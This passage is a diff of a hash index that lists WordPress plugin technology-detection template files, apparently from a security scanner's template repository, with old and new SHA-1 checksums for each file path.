-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3aa657b603a122999a7b7f29025758df12a0b6f6 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:36c8dafa668cca638bf855cf22db851e04568b22 +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 